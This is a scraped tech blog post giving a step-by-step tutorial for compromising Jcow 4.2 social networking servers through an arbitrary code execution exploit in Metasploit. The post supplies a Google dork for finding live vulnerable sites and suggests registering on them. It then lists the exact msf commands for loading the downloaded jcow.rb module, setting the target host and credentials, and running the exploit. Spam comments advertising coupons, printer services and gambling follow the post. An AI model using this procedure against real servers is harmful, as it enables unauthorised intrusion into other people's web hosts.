Tech News World, Contacts Samsung Galaxy, Windows 8, Nokia Lumia, Quad Core Smart Phones, HTC smartphone, Google Nexus, MacBook, PayPal

Thursday, January 7, 2016

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution - Although I work in the office and a lot of work that makes me tired but still I make a blog Tech News World and still will update it for you because this is part of my hobby who likes the world of technology, especially about the gadget, now we will discuss first about 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution because it is the topic that you are now looking for, please refer to the information I provide in the guarantee for you,

Articles : 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution
full Link : 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution
Article DNS Hacking, Article Learn Hacking,

You can also see our article on:


4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social networking engine can be exploited and the exploit ranking marked as "excellent".
So actually, what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example, if you hosting your Jcowvulnerable version(on insecure hosting also icon_smile ) you can own your web server directory.
In this example, let's say I have a Jcow vulnerable web server in IP address 192.168.8.94. Actually, it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext: Powered by Jcow 4.2.0" and register as the normal user there. In this tutorial I have already registered as username: victim and password also victim icon_smile
Okay, I hope you understand what I say above icon_razz to make it more realistic, let's try the tutorial…

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution
4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

Level: Medium

Victim Server: work fine if victim uses Windows XP SP3
Victim vulnerable application: JCow 4.2
Attacker O.S: obviously you need Backtrack 5 R1

Requirement :

Here only you need bellow two item.
Which is your actual need.

1#. Metasploit framework

2.# Jcow.rb exploit mediafire.com

Now lets start this article.

Steps Hacking Jcow Social Networking Web Server via ArbitraryCode Execution Process:

1.#, first of all, you simply  Copy the 

downloaded cow.rb exploit from the 

download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(for example see the command below).
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
now you see the text "framework" in blue color it's only because I'm using 

Backtrack 5 R1 and using Metasploit 

v4.0.1, so the name depended on 

your Metasploit version, maybe on your 

the computer can be "framework3" or 

"framework2" so on..so don't have

confused.

2.# now when you copy successfully 

after that, simply  Open your Metasploit 

console and then use the exploit you just added before see bellow 


msf > use exploit/remote/jcow


3.# now when you complete step 2, The 

next step we need to view the available 

switch for this exploit by running the show 

options command, and then configured it(see the text with red color).
jcow_bypass1
msf  exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim --> set the username
username => victim
msf exploit(jcow) > set password victim --> set the password
password => victim
msf exploit(jcow) > set uri jcow --> only if jcow not in/directory fill it here
uri => jcow
Importent:::?

Set URI can be used if cow was not 

installed on web server main directory

for example http://web-server.com/jcow.

4#. now your work has been almost  

done , After everything was set up 

successfully, the next thing to do was 

exploiting or running the exploit by using

  exploit command.



so much information about 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

hopefully information 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution can provide useful knowledge for you in getting information about the latest gadgets,

just finished your reading article about 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution if you feel this article useful for you please bookmark or share using link https://aziin5teens.blogspot.com/2016/01/4-steps-hacking-jcow-social-networking.html for more people know

Tag : , ,
Share on Facebook
Share on Twitter
Share on Google+

Related : 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

7 comments:


  1. The Exclusive way to download Alexa app, connect Alexa echo to wifi, setup your echo device (Echo, Echo dot, Echo show etc.) Today get Alexa app and setup it with
    Alexa echo device by following easy steps. To know simple steps.Visit
    alexa.amazon.com
    connect Alexa echo to wifi
    alexa app
    amazon alexa setup
    register & setup alexa echo

    ReplyDelete
  2. Wow! Really good information. Thanks for sharing.
    Also we have great offers and discounts
    Please visit and use!
    easemytrip offers
    easemytrip coupon code
    easemytrip coupons

    Uber Eats Promo Code
    Uber Eats Coupons
    Uber Eats Offers

    ReplyDelete
  3. Hello! Your article is informative enough. I plan to open my own site and have even found Writology catalog copywriting service for my business

    ReplyDelete
  4. A leading service provider in the printer, imaging, and scanner system devices, we deliver high quality services that can exceed the expectation of our customers.
    https://www.printerofflinefix.online

    for more details

    ReplyDelete
  5. hello,
    Your Site is very nice, and it's very helping us this post is unique and interesting, thank you for sharing this awesome information. and visit our blog site also
    Satta King

    ReplyDelete
  6. http://Kronospoker.com situs penyedia Daftar Judi Poker Online Terpercaya, IDN Poker, capsa susun online, ceme online, ceme keliling, super10, omaha dan domino QQ terbaik dan terpercaya Indonesia. Kronospoker selalu memberikan pengalaman bermain judi kartu online terbaik kepada seluruh membernya.

    Disini kami telah mendapatkan kepercayaan dan reputasi terbaik dari para member Poker Indonesia, Karena kami memberikan pelayanan kepada semua member yang bermain di situs kami.

    Serta Berapapun kemenangan yang anda dapatkan akan langsung dibayar oleh Agen Judi Poker Online Terbaik Kronospoker, mau itu jackpot atau bonus lainnya.

    Semua permainan yang tersedia dapat anda mainkan hanya dengan menggunakan 1 user ID yang akan anda dapatkan setelah melakukan pendaftaran akun di Kronospoker. Selain menyediakan permainan Online Poker, Kronospoker juga menyediakan game Domino QQ, Capsa Susun terbaik di Indonesia.

    Pelayanan terbaik adalah prioritas utama dari Agen Judi IDN Poker Online Kronospoker. Kami menyediakan pelayanan customer service professional, sopan dan handal dalam bidangnya yang selalu siap membantu anda. Hanya dengan minimal deposit sebesar 10 ribu Rupiah, para pecinta permainan Judi Online dapat memainkan semua permainan yang tersedia di Kronospoker.

    Ada beberapa keunggulan yang membuat Agen Judi Poker Kronospoker menjadi Daftar Poker Indonesia Online Terpercaya. Dan menjadi salah satu tempat wajib bagi para pecinta permainan judi kartu online untuk bermain. Diantaranya yaitu:

    Dalam permainan judi online di Kronospoker, kami menjamin 100% player vs player. Dan itu berlaku untuk semua permainan yang ada. Semua murni tanpa adanya campur tangan robot ataupun admin kami.

    Kronospoker memberikan bonus Rollingan paling besar yang berlaku untuk semua jenis permainan.

    Proses transaksi yang cepat serta data para pemain dijamin keamanannya.

    Semua permainan dapat anda akses dengan mudah melalui komputer, notebook, dan smartphone Android maupun IOS.

    Situs judi online dengan winrate tertinggi. Win Rate dalam semua permainan di Kronospoker mencapai hampir 100%.

    ReplyDelete
  7. hello,
    Your Site is very nice, and it's very helping us this post is unique and interesting, thank you for sharing this awesome information. and visit our blog site also
    Satta King

    ReplyDelete